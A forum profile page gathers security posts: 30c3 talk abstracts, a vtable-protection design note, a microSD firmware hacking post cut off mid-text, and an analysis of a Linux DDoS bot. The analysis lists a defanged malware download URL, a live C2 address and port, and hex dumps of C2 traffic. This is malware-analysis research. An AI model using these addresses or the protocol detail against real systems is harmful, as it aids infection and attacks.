Jump to content

Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    706

Everything posted by Nytro

  1. [h=1]Fast Internet-wide Scanning and its Security Applications [30c3][/h] _MS0uQv3h&index=23Fast Internet-wide Scanning and its Security Applications Internet-wide network scanning has powerful security applications, including exposing new vulnerabilities, tracking their mitigation, and exposing hidden services. Unfortunately, probing the entire public address space with standard tools like Nmap requires either months of time or large clusters of machines. In this talk, I'll demonstrate ZMap, an open-source network scanner developed by my research group that is designed from the ground up to perform Internet-wide scans efficiently. We've used ZMap with a gigabit Ethernet uplink to survey the entire IPv4 address space in under 45 minutes from a single machine, more than 1300 times faster than Nmap. I'll explain how ZMap's architecture enables such high performance. We'll then work through a series of practical examples that explore the security applications of very fast Internet-scale scanning, both offensive and defensive. I'll talk about results and experiences from conducting more than 300 Internet-wide scans over the past 18 months, including new revelations about the state of the HTTPS CA ecosystem. I'll discuss the reactions our scans have generated--on one occasion we were mistaken for an Iranian attack against U.S. banks and we received a visit from the FBI--and I'll suggest guidelines and best practices for good Internet citizenship while scanning. Internet-scale network surveys collect data by probing large subsets of the public IP address space. While such scanning behavior is often associated with botnets and worms, it also has proved to be a powerful methodology for security research. Recent studies, beginning with the EFF's SSL Observatory, have demonstrated that Internet-wide scanning can help reveal new kinds of vulnerabilities, monitor deployment of mitigations, and shed light on previously opaque distributed ecosystems. Unfortunately, this methodology has been more accessible to attackers than to researchers without access to botnets or willingness to spread self-replicating code. Comprehensively scanning the public address space with off-the-shelf tools like Nmap requires weeks of time or many machines. To make Internet-wide scanning more accessible, my research team recently introduced ZMap, an open-source network scanner that is designed from the ground up to perform Internet-scale port scans. In our tests using a gigabit Ethernet uplink, ZMap scans the entire IPv4 address space in under 45 minutes from a single machine, more than 1300 times faster than Nmap. By the time of the talk, we'll have switched to a 10 gigE uplink, which should theoretically support scanning the entire address space in under 5 minutes. I'll explain how ZMap's architecture enables such high performance by taking advantage of fast modern hardware and recent improvements to the Linux kernel. We'll work through a series of practical examples that explore the security applications of very fast Internet-scale scanning, both offensive and defensive, and I'll share experiences from conducting more than 300 Internet-wide scans over the past 18 months, totaling well over 1 trillion probes. I'll describe how we completed hundreds of scans targeting every public HTTPS server (each scan larger than the entire SSL Observatory) in order to shed light on the growth of HTTPS deployments and expose security problems within the HTTPS ecosystem, such as misissued CA certs and widespread server misconfiguration. I'll show how high-speed scanning can be used to expose vulnerable hosts, using IPMI and UPnP vulnerabilities as recent examples. Malicious attackers could abuse this capability to exploit 0day vulnerabilities affecting millions of hosts within hours of a problem's discovery, and better defenses are badly needed. Finally, I'll discuss applications to Internet freedom, including discovering unadvertised services such as hidden Tor bridges (used for censorship resistance) and Bluecoat devices (used for state-sponsored censorship). High-speed scanning can be a powerful tool in the hands of security researchers, but users must be careful not to cause harm by inadvertently overloading networks or causing unnecessary work for network administrators. I'll discuss the complaints and other reactions my group's scanning has generated--on one occasion we were mistaken for an Iranian DoS attack on U.S. banks, and we received a visit from the FBI--and I'll suggest several guidelines and best practices for good Internet citizenship while scanning. Speaker: J. Alex Halderman EventID: 5533 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Sat, 12/28/2013 + Lizenz: CC-by
  2. [h=1]Bug class genocide [30c3][/h] _MS0uQv3h&index=31Bug class genocide Applying science to eliminate 100% of buffer overflows Violation of memory safety is still a major source of vulnerabilities in everyday systems. This talk presents the state of the art in compiler instrumentation to completely eliminate such vulnerabilities in C/C++ software. The hacker community has a lot of words for situations in which access to the wrong part of memory leads to an exploitable vulnerability: buffer overflow, integer overflows, stack smashing, heap overflow, use-after-free, double free and so on. Different words are used because the techniques to trigger the faulty memory access and to subsequently use that to gain code execution vary, but they all share a common root cause: violation of spatial and temporal memory safety. If one looks at the C/C++ standard, the situations that tend to be exploitable are "unspecified". Usually, compiler writers take that as an excuse to cut corners, to gain that extra bit of performance in the benchmarks. Because, you know, who cares you're exploitable when you make a mistake, look how fast it is! However, the standards also allow the compiler to introduce safety checks, to see whether access to a pointer actually touches the inside of an allocated object instead of the outside (spatial memory safety), and to make sure that the pointer being accessed actually points to an object that has been allocated, but not yet been freed again (temporal memory safety). Such compilers do exist, in the form of LLVM with specialized optimizer passes that introduce runtime safety checks. This talk will look into the details of the implementation, the performance impact, practical handling, and of course, whether it really delivers the promised 100% protection against buffer overflows. Speaker: Andreas Bogk EventID: 5412 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Fri, 12/27/2013 + Lizenz: CC-by
  3. [h=1]How to Build a Mind - Artificial Intelligence Reloaded [30c3][/h] _MS0uQv3h&index=40How to Build a Mind Artificial Intelligence Reloaded A foray into the present, future and ideas of Artificial Intelligence. Are we going to build (beyond) human-level artificial intelligence one day? Very likely. When? Nobody knows, because the specs are not fully done yet. But let me give you some of those we already know, just to get you started. While large factions within the philosophy of mind still seem to struggle over the relationship between mind, world, meaning, intentionality, subjectivity, phenomenal experience, personhood and autonomy, Artificial Intelligence (AI) offers a clear and concise set of answers to these basic questions, as well as avenues of pursuing their eventual understanding. In the view of AI, minds are computational machines, whereby computationalism is best understood as the most contemporary version of the mechanist world view. In the lecture, I will briefly address some of the basic ideas that will underlie a unified computational model of the mind, and especially focus on a computational understanding of motivation and autonomy, representation and grounding, associative thinking, reason and creativity. Speaker: Joscha EventID: 5526 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Sun, 12/29/2013 + Lizenz: CC-by
  4. [h=1]FPGA 101 - Making awesome stuff with FPGAs [30c3][/h] _MS0uQv3h&index=54FPGA 101 Making awesome stuff with FPGAs In this talk I want to show you around in the mysterious world of Field Programmable Gate Arrays, or short FPGAs. The aim is to enable you to get a rough understanding on what FPGAs are good at and how they can be used in areas where conventional CPUs and Microcontrollers are failing upon us. FPGAs open up the world of high-speed serial interconnects, nano-second event reactions and hardware fuzzing. In this lecture I will present you the basics of how FPGAs work and how to program them. I will also show-case some tasks where FPGAs really shine. As an example I will show how a 200 MHz FPGA can perform a discrete wavelet twice as fast as an 2.6 GHz i7. I will also show other applications where FPGAs are almost unbeatable, compared to a CPU. At the end I will give you an overview of the market. What are hacker friendly boards, which vendors tool chain sucks the least etc. After this lecture you should be able to decide whether a CPU, a GPU or an FPGA could solve your problem the most efficient. Speaker: Karsten Becker EventID: 5185 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Sat, 12/28/2013 + Lizenz: CC-by
  5. [h=1]Reverse engineering the Wii U Gamepad [30c3][/h] _MS0uQv3h&index=65Reverse engineering the Wii U Gamepad A year ago in November 2012, Nintendo released their latest home video game console: the Wii U. While most video game consoles use controllers that are very basic, the Wii U took the opposite route with a very featureful gamepad: wireless with a fairly high range, touch screen, speakers, accelerometer, video camera, and even NFC are supported by the Wii U gamepad. However, as of today, this interesting piece of hardware can only be used in conjunction with a Wii U: wireless communications are encrypted and obfuscated, and there is no documentation about the protocols used for data exchange between the console and its controller. Around december 2012, I started working with two other hackers in order to reverse engineer, document and implement the Wii U gamepad communication protocols on a PC. This talk will present our findings and show the current state of our reverse engineering efforts. When the Wii U was released, a few console hackers and I were talking about potential uses for the Wii U gamepad. However, before being able to use a Wii U gamepad as a remote controller for a robot or a quadricopter, the first step was to understand how it worked and how to communicate with it. This started our long journey of soldering wires on Flash chips, reading the h.264 specification and complaining about the lack of features in most Wi-Fi drivers and devices (on all platforms, Linux and ath9k devices being the least horrible). While some "journalists" reported that the Wii U gamepad is using the Miracast™ technology, a Wi-Fi standard, it turned out that this was never the case. Instead, Nintendo decided to reinvent four different protocols (video streaming, audio streaming, input streaming as well as a light request-reply RPC protocol), and embed them in a slightly obfuscated version of WPA2, sent over the air using 5GHz Wi-Fi 802.11n. A small ARM CPU is embedded in the Wii U Gamepad (codenamed DRC) and runs a realtime operating system to handle network communication. In the Wii U, another ARM CPU (codenamed DRH) does the same thing. In this presentation, we will go into the details of how we went from a 32MB binary blob to a proof of concept of Wii U gamepad "emulation" on a PC, including full documentation of the wireless communications obfuscation layer and partial documentation of the four data exchange protocols used on the gamepad. Speaker: delroth shuffle2 EventID: 5322 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Sun, 12/29/2013 + Lizenz: CC-by
  6. [h=1]Backdoors, Government Hacking and The Next Crypto Wars [30c3][/h] _MS0uQv3h&index=69Backdoors, Government Hacking and The Next Crypto Wars Law enforcement agencies claim they are "going dark". Encryption technologies have finally been deployed by software companies, and critically, enabled by default, such that emails are flowing over HTTPS, and disk encryption is now frequently used. Friendly telcos, who were once a one-stop-shop for surveillance can no longer meet the needs of our government. What are the FBI and other law enforcement agencies doing to preserve their spying capabilities? The FBI is rallying political support in Washington, DC for legislation that will give it the ability to fine Internet companies unwilling to build surveillance backdoors into their products. Even without such legislation, the US government has started to wage war against companies that offer secure communications services to their users. As the FBI's top lawyer said in 2010, "[Companies] can promise strong encryption. They just need to figure out how they can provide us plain text." At the same time, law enforcement agencies in the United States and elsewhere are acquiring the tools to hack into the computers of their own citizens. The FBI has purchased custom-built software, while other law enforcement agencies in the US and elsewhere use off-the-shelf spyware from companies like Gamma and Hacking Team. Regardless of the software they use, the capabilities are generally similar: They can enable a computer's webcam and microphone; collect real-time location data; and copy emails, web browsing records, and other documents. Speaker: Christopher Soghoian EventID: 5478 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Sun, 12/29/2013 + Lizenz: CC-by
  7. [h=1]The Tor Network [30c3] (with Jacob Applebaum)[/h] 73The Tor Network We're living in interesting times Roger Dingledine and Jacob Appelbaum will discuss contemporary Tor Network issues related to censorship, security, privacy and anonymity online. The last several years have included major cryptographic upgrades in the Tor network, interesting academic papers in attacking the Tor network, major high profile users breaking news about the network itself, discussions about funding, FBI/NSA exploitation of Tor Browser users, botnet related load on the Tor network and other important topics. This talk will clarify many important topics for the Tor community and for the world at large. Speaker: Jacob arma EventID: 5423 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Fri, 12/27/2013 + Lizenz: CC-by
  8. [h=1]Extracting keys from FPGAs, OTP Tokens and Door Locks [30c3][/h] index=78Extracting keys from FPGAs, OTP Tokens and Door Locks Side-Channel (and other) Attacks in Practice Side-channel analysis (SCA) and related methods exploit physical characteristics of a (cryptographic) implementations to bypass security mechanisms and extract secret keys. Yet, SCA is often considered a purely academic exercise with no impact on real systems. In this talk, we show that this is not the case: Using the example of several wide-spread real-world devices, we demonstrate that even seemingly secure systems can be attacked by means of SCA with limited effort. This talk briefly introduces implementation attacks and side-channel analysis (SCA) in particular. Typical side-channels like the power consumption and the EM emanation are introduced. The main focus is then on three case studies that have been conducted as part of the SCA research of the Chair for Embedded Security (Ruhr-Uni Bochum) since 2008: The first example are FPGAs that can be protected against reverse-engineering and product counterfeit with a feature called "bitstream encryption". Although the major vendors (Xilinx and Altera) use secure ciphers like AES, no countermeasures against SCA were implemented. As a second example, a wide-spread electronic locking system based on proprietary cryptography is analyzed. The target of the third case study is a popular one-time password token for two-factor authentication, the Yubikey 2. In all three cases, the cryptographic secrets could be recovered within a few minutes to a few hours of measurements, allowing an adversary to decrypt FPGA bitstreams, to clone Yubikeys, and to open all locks in an entire installation, respectively. In conclusion, we summarize possible countermeasures against the presented attacks and describe the communication with the respective vendors as part of a responsible disclosure process. Speaker: David EventID: 5417 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Sat, 12/28/2013 + Lizenz: CC-by
  9. [h=1]The philosophy of hacking [30c3][/h] The philosophy of hacking Contemplations on the essence of hacking and its implications on hacker ethics Modern society's use of technology as an instrument for domination is deeply problematic. Are instrumentality and domination inherent to the essence of technology? Can hacking provide an alternative approach to technology which can overcome this? How do art and beauty fit into this approach? In order to understand the essence of hacking, it is important to first critically examine the essence of (modern) technology and the rationalization of technological development. Because for all the wonderful things technology has given us, it has also brought us a vast array of instruments for domination, ranging from nuclear warheads to the panoptic surveillance state. As a community that is so deeply involved with technology, it is imperative for us to comprehend that these developments did not come out of thin air and that we have the choice to follow a different path. Understanding Heideggers notion of enframing as the product of historical rationalization gives us an insight in the relation between the objective, scientific approach to technology and its instrumentalization as a means for domination. Yet it also highlights the subversive potential of hacker cultures. The hackers' playful curiosity and desire to express creativity within the computer-imposed frameworks of formal logic has the potential to transcend code into poetry, reconnecting techne with poiesis and mapping the road towards the revealing nature of technology. Hacking has the potential to elevate abstract technological mechanisms and relations dissociated from the individuality to the plane of the utmost concrete and subjective images. As the creative output of the hacker both adheres to the formal methods of boolean logic and at the same time challenges them by devoiding them of their rational finalities, the positivist rationale of what we hold to be most objective can be turned into an expression of the subject. I will argue that this repositioning of the subject provides the basis for transforming the technological rationale into one that is aimed at liberation. Speaker: groente EventID: 5278 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Mon, 12/30/2013 + Lizenz: CC-by
  10. [h=1]Hardware Attacks, Advanced ARM Exploitation, and Android Hacking[/h]CCCen Hardware Attacks, Advanced ARM Exploitation, and Android Hacking In this talk (which in part was delivered at Infiltrate 2013 and NoSuchCon 2013) we will discuss our recent research that is being rolled into our Practical ARM Exploitation course (sold out at Blackhat this year and last) on Linux and Android (for embedded applications and mobile devices). We will also demonstrate these techniques and discuss how we were able to discover them using several ARM hardware development platforms that we custom built. Where relevant we will also discuss ARM exploitation as it related to Android as we wrote about in the "Android Hackers Handbook" which we co-authored and will be released in October 2013. Lastly, we will also discuss some of our most recent related hardware research (to facilitate the above) which will include bus protocol eavesdropping/reverse engineering, demystifying hardware debugging, and surreptitiously obtaining embedded software (firmware) using hardware techniques. We will demonstrate and show the supportive tools used and techniques developed to perform this work and deploy them against Apple MFI iAP devices, and multimedia devices using OEM implemented USB stacks. (Which will briefly include our experiences around starting int3.cc - Tools for the Talented where we sell a fully assembled modified version of a hardware USB fuzzer.) Along the way we will inevitably share some of the lessons we also learned while completely designing the hardware (from scratch), writing the firmware, and mobile apps for an embedded security device called Osprey that we hold the patent for and have been publicly about publicly as a hardware vulnerability assessment swiss-army-knife for researchers. Speaker: Stephen A. Ridley EventID: 5193 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: 12/28/2013 + Lizenz: CC-by
  11. vtable protections: fast and thorough? Recently, there's been a reasonable amount of activity in the vtable protection space. Most of it is compiler-based. For example, there's the GCC-based virtual table verification, aka. VTV. There are also multiple experiments based on clang / LLVM and of course MSVC's vtguard. In the non-compiler space, there's Blink's heap partitioning, enabled by PartitionAlloc. It seems, though, that these various techniques require the user to choose between "fast" or "thorough protection". This isn't ideal. Shortly, I'll document my own idea for how to try and get both fast and thorough. But first, a recap on what we mean by fast and thorough. Fast vtable protection Protecting vtables typically involves inserting machine instructions around vtable pointer load or virtual calls. Going fast is simple: only insert a very small number of fast instructions (i.e. no hard-to-predict branches). This is the approach taken by vtguard. If you look at page 14 in the vtguard PDF linked above, you'll see that there's just a single cmp and a single jne (short, and never taken in normal execution) added to the hot path. Tangentially, another task commonly undertaken when adding vtable protections to a given program is to remove as many virtual calls as possible, by annotating classes and methods with the "final" keyword and/or applying whole-program optimizations. Thorough vtable protection Describing what we want in a thorough vtable protection is a little more involved. We want: Defeating ASLR does not defeat the vtable check. (vtguard lacks this property, whereas the GCC implementation has it.) Only a valid vtable pointer can be used. Furthermore, only a vtable pointer corresponding to the correct hierarchy for the call site can be used. Ideally, only a vtable pointer corresponding to the correct hierarchy level for the call site can be used. A fast solution for thorough vtable protection? How can we get all of the protections above and get them fast? My idea revolves around separating the problem into two pieces: Work out whether we can trust the vtable pointer or not. Validate that the class type represented by the vtable pointer is appropriate for the call site. To trust or not to trust? Current schemes trust the vtable pointer or not, based either on an some secret (vtguard, xor-based LLVM approach), a fixed table of valid values (GCC, some LLVM approaches) or by constraining values that might appear in the vtable position (heap partitioning). The new scheme would be to reserve a certain portion of the address space for vtables. We know that nothing else can be mapped there, so by suitably masking any proposed vtable pointer, we know it is valid. I haven't fully thought this through for 32-bit, but look at this 64-bit variant: Host vtables in the lower 4GB of address space. Use the dereference of a 32-bit register to load the vtable entry. This provides masking for free and even saves a byte in the instruction sequence. It works because loading 4-bytes into a 64-bit register zero extends the result. Optionally, save memory by having the compiler use 4-byte vtables. This scheme is approximately free, maybe even performance positive in some situations. Furthermore, one possible implementation is to stop somewhere around here for a very fast protection scheme that is "ok" in thoroughness. On the downside, you've lost the 64-bit invariant that "nothing is mapped in the bottom 4GB", but the percentage of space used is going to be small. If that bothers us, then we can use the same trick to load a 4-byte vtable pointer and then "or" it with 0x100000000 (use bts if you dare) or some other value. Validating class type Once you know you trust your vtable pointer, validating the class type becomes a lot simpler. Instead of messing with secrets inside the vtable, you can just store a compact representation of the class type inside the vtable, with the aim of satisfying validation needs with a single compare. The one trick we want to play is to make it easy to validate various different positions in a class hierarchy with minimal work. To do this, we can store class details in a hierarchical format. To take a simple case, imagine that we have the following classes in the system: A1, A1:B1, A2, A2:B1, A2:B1:C1 We encode these using one byte per hierarchy level, the basemost class being the LSB: 00000001, 00000101, 00000002, 00000102, 00010102. (Note that this will be an approximation. For example, if you have more than 256 basemost classes with virtual functions, you would need to represent the first level with 2 or more bytes.) Finally, our "is this object of the correct type for the callsite?" check becomes a simple compare. Depending on the position in the hierarchy, we may be able to achieve the compare with no masking and therefore a single instruction. For example, for a call site expecting an object of type A1, it's just "cmpb $1, (%eax)". That's a 4-byte sequence, which is much shorter than the 10-byte sequence noted in the vtguard PDF. For a call site expecting an object of type A2:B1, it's "cmpw $0x102, (%eax)". Closing notes Will it work well? Who knows. I haven't had time to implement this, nor am I likely to in the near future. Feel free to take this and run with it. Note that this idea doesn't cover what to do with raw function pointer calls. If you want to head towards complete control flow integrity, you'll want to look at protecting those, as well as return addresses (the current canary-based stack defenses do nothing against an arbitrary read/write primitive). Posted by Chris at 5:11 PM Sursa: Security: vtable protections: fast and thorough?
  12. Another look at a cross-platform DDoS botnet I learned from a recent " Malware Must Die" post about a Linux malware sample that is associated with DNS amplification attacks. As mentioned in the MMD post, several researchers have posted on this, or similar malware. Since I'm particularly interested in Linux malware, especially if it has a DDoS component, I thought I'd also take a look. I was able to get the malware to execute on my Linux sandbox and connect to the C&C. While I've yet to see any DDoS related activity, I did pcap the C2 comms and snap an image for Volatility analysis. Links to the pcap and memory image can be found at the bottom of this post. The malware was downloaded from hxxp://198.2. [.] 192.204:22/disknyp The MD5 hash value of the sample I obtained is 260533ebd353c3075c9dddf7784e86f9 The C2 is located at 190.115.20.27:59870 Referencing the supplied pcap, the compromised host connected to the C2 at 18:46 EST. Upon connection to the C2, the compromised host sends information about the current Linux kernel, in this case, "Linux 2.6.32-33-generic-pae" [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]bot sending kernel info to C2[/TD] [/TR] [/TABLE] It's interesting to note that the bot's C2 communications is via a persistent connection. Unlike typical HTTP bot check-in traffic, this bot maintains a connection to the remote host on port 59870. Since this is all one huge session, if you attempt "Follow TCP stream" in Wireshark, it will take a bit of time to present the output. The C2 then sends 4 bytes, "0x04 0x00 0x00 0x00" upon which the bot sends back 27 bytes of all 0x00. At 21:13, the C2 sends 75 bytes of hex: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Initial 75 byte sequence from C2 to bot[/TD] [/TR] [/TABLE] Approx. every thirty seconds, the C2 sends a new 75 byte sequence to the bot, for example: 01:00:00:00:43:00:00:00:00:fd:05:00:00:00:00:00:00:01:00:00:00:01:00:00:00:80:d4:07:c6:9c:50:00:01:00:00:00:00:00:00:00:1e:00:00:00:00:04:00:00:00:04:00:00:10:27:60:ea:ac:f5:a5:8f:ac:f5:a5:8f:00:00:00:00:00:d4:07:c6:9c:50:00 01:00:00:00:43:00:00:00:00:fe:05:00:00:00:00:00:00:01:00:00:00:01:00:00:00:80:d4:07:c7:d4:50:00:01:00:00:00:00:00:00:00:1e:00:00:00:00:04:00:00:00:04:00:00:10:27:60:ea:ac:f5:a5:8f:ac:f5:a5:8f:00:00:00:00:00:d4:07:c7:d4:50:00 01:00:00:00:43:00:00:00:00:ff:05:00:00:00:00:00:00:01:00:00:00:01:00:00:00:80:d4:07:c6:9b:50:00:01:00:00:00:00:00:00:00:1e:00:00:00:00:04:00:00:00:04:00:00:10:27:60:ea:ac:f5:a5:8f:ac:f5:a5:8f:00:00:00:00:00:d4:07:c6:9b:50:00 Byte offset decimal 09 appears to be a counter, incrementing by one each time on each sequence from the C2. The contents at decimal offset 28 and and 71 initially vary between 0xC6 and 0xC7. This continues until 22:06 EST when the pattern changes and varied values are seen: 01:00:00:00:43:00:00:00:00:1d:06:00:00:00:00:00:00:01:00:00:00:01:00:00:00:80:73:ee:ed:f5:58:1b:01:00:00:00:00:00:00:00:0c:00:00:00:00:04:00:00:00:04:00:00:10:27:60:ea:ac:f5:a5:8f:ac:f5:a5:8f:00:00:00:00:00:73:ee:ed:f5:58:1b 01:00:00:00:43:00:00:00:00:1e:06:00:00:00:00:00:00:01:00:00:00:01:00:00:00:80:7a:e0:22:c7:58:1b:01:00:00:00:00:00:00:00:0c:00:00:00:00:04:00:00:00:04:00:00:10:27:60:ea:ac:f5:a5:8f:ac:f5:a5:8f:00:00:00:00:00:7a:e0:22:c7:58:1b 01:00:00:00:43:00:00:00:00:1f:06:00:00:00:00:00:00:01:00:00:00:01:00:00:00:80:0e:11:5f:4a:58:1b:01:00:00:00:00:00:00:00:0c:00:00:00:00:04:00:00:00:04:00:00:10:27:60:ea:ac:f5:a5:8f:ac:f5:a5:8f:00:00:00:00:00:0e:11:5f:4a:58:1b 01:00:00:00:43:00:00:00:00:20:06:00:00:00:00:00:00:01:00:00:00:01:00:00:00:80:3d:84:e6:15:5b:1b:01:00:00:00:00:00:00:00:0c:00:00:00:00:04:00:00:00:04:00:00:10:27:60:ea:ac:f5:a5:8f:ac:f5:a5:8f:00:00:00:00:00:3d:84:e6:15:5b:1b The bot's replies again replies with a 27 byte sequence, however decimal offset 19 now has a value that will vary between 0 and 2. 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:01:00:00:00:00:00:00:00 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02:00:00:00:00:00:00:00 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 Volatility Some basic Volatility analysis of the memory image yields the following: linux_pslist [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]linux_pslist[/TD] [/TR] [/TABLE] The 'disknyp' process started at 23:45 UTC with PID 1241. Ran with user privs and no child processes were noted. linux_lsof -p1241 [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]linux_lsof for PID 1241[/TD] [/TR] [/TABLE] Process 'disknyp', PID 1241 has /dev/null open as well as socket:[6931] linux_proc_maps [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]linux_proc_maps for PID 1241[/TD] [/TR] [/TABLE] Note that /tmp/disknyp is the path where 'disknyp' was originally executed. Dumping the two segments at '/usr/tmp' produces two files, 'task.1241.0x8048000.vma' and 'task.1241.0x8168000.vma'. Running 'file' on the segments shows: task.1241.0x8048000.vma: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped Dumping strings for that segment shows: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]section of 'strings' output for PID 1241 segment 0x8048000[/TD] [/TR] [/TABLE] We note the string "fake.cfg" that was mentioned in other posts related to this malware. Attempting to find the file in the original /tmp directory: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]linux_find_file for 'fake.cfg'[/TD] [/TR] [/TABLE] linux_yarascan Let's use the 'yarascan' plugin to see if there are any other references to 'fake.cfg' in this image. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]searching for other references to 'fake.cfg' using the linux_yarascan plugin[/TD] [/TR] [/TABLE] We see that the string 'fake.cfg' is only found in PID 1241, 'disknyp'. Again using the 'linux_find_file' plugin, we can dump the contents of 'fake.cfg' located at inode 0xed9dc088. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Contents of 'fake.cfg'[/TD] [/TR] [/TABLE] Final Thoughts This appears to be some Proof of Concept or "testing" malware. There are several aspects to this sample that make me wonder if it was just put out there to see how quickly it would be detected and analyzed. Analysis of the original file as downloaded from hxxp://198.2. [.] 192.204:22/disknyp that it is statically linked, not stripped. The C2 communications is somewhat noisy. Maintaining a persistent connection with checkins every few seconds is not very stealthy. No attempt to hide the process. In hours of running this, I didn't see any child processes or variance in the process on the local host. 'fake.cfg' is created in the malware's working directory. 'fake.cfg' really? As I mentioned earlier in the post, I have yet to see any DoS related traffic from this sample. I'm also not aware of DoS activity being seen by other researchers. If anyone has learned otherwise, I'd love to hear from you! Reference: Packet capture of initial malware download and execution - disknyp.pcap 4.1 MB - MD5 hash - 4fb44dfa3d98e17f13c6befd55787582 Memory image of Ubuntu Server infected with 'disknyp' - linux_disknyp.zip 167 MB - MD5 hash of unzipped .vmem - 04831ad2fbd089c2c5b7b8dc657d0e7a (Linux Volatility profile: LinuxUbuntu1004_pae32-33x86) Posted by Andre M. DiMino at 4:36 PM Sursa: Andre' M. DiMino -SemperSecurus: Another look at a cross-platform DDoS botnet
  13. [h=1]PENETRATION TESTING PRACTICE LAB - VULNERABLE APPS / SYSTEMS[/h]Following table gives the URLs of all the vulnerable web applications, operating system installations, old software and war games [hacking] sites. The URLs for individual applications that are part of other collection entities were not given as it is not necessary to download each of them and manually configure them if they are already available in a configured state. For technologies used in each web application, please refer to the mindmap above. http://www.amanhardikar.com/mindmaps/PracticeUrls.html
  14. On Hacking MicroSD Cards Today at the Chaos Computer Congress (30C3), xobs and I disclosed a finding that some SD cards contain vulnerabilities that allow arbitrary code execution — on the memory card itself. On the dark side, code execution on the memory card enables a class of MITM (man-in-the-middle) attacks, where the card seems to be behaving one way, but in fact it does something else. On the light side, it also enables the possibility for hardware enthusiasts to gain access to a very cheap and ubiquitous source of microcontrollers. In order to explain the hack, it’s necessary to understand the structure of an SD card. The information here applies to the whole family of “managed flash” devices, including microSD, SD, MMC as well as the eMMC and iNAND devices typically soldered onto the mainboards of smartphones and used to store the OS and other private user data. We also note that similar classes of vulnerabilities exist in related devices, such as USB flash drives and SSDs. Flash memory is really cheap. So cheap, in fact, that it’s too good to be true. In reality, all flash memory is riddled with defects — without exception. The illusion of a contiguous, reliable storage media is crafted through sophisticated error correction and bad block management functions. This is the result of a constant arms race between the engineers and mother nature; with every fabrication process shrink, memory becomes cheaper but more unreliable. Likewise, with every generation, the engineers come up with more sophisticated and complicated algorithms to compensate for mother nature’s propensity for entropy and randomness at the atomic scale. These algorithms are too complicated and too device-specific to be run at the application or OS level, and so it turns out that every flash memory disk ships with a reasonably powerful microcontroller to run a custom set of disk abstraction algorithms. Even the diminutive microSD card contains not one, but at least two chips — a controller, and at least one flash chip (high density cards will stack multiple flash die). You can see some die shots of the inside of microSD cards at a microSD teardown I did a couple years ago. In our experience, the quality of the flash chip(s) integrated into memory cards varies widely. It can be anything from high-grade factory-new silicon to material with over 80% bad sectors. Those concerned about e-waste may (or may not) be pleased to know that it’s also common for vendors to use recycled flash chips salvaged from discarded parts. Larger vendors will tend to offer more consistent quality, but even the largest players staunchly reserve the right to mix and match flash chips with different controllers, yet sell the assembly as the same part number — a nightmare if you’re dealing with implementation-specific bugs. The embedded microcontroller is typically a heavily modified 8051 or ARM CPU. In modern implementations, the microcontroller will approach 100 MHz performance levels, and also have several hardware accelerators on-die. Amazingly, the cost of adding these controllers to the device is probably on the order of $0.15-$0.30, particularly for companies that can fab both the flash memory and the controllers within the same business unit. It’s probably cheaper to add these microcontrollers than to thoroughly test and characterize each flash memory chip, which explains why managed flash devices can be cheaper per bit than raw flash chips, despite the inclusion of a microcontroller. The downside of all this complexity is that there can be bugs in the hardware abstraction layer, especially since every flash implementation has unique algorithmic requirements, leading to an explosion in the number of hardware abstraction 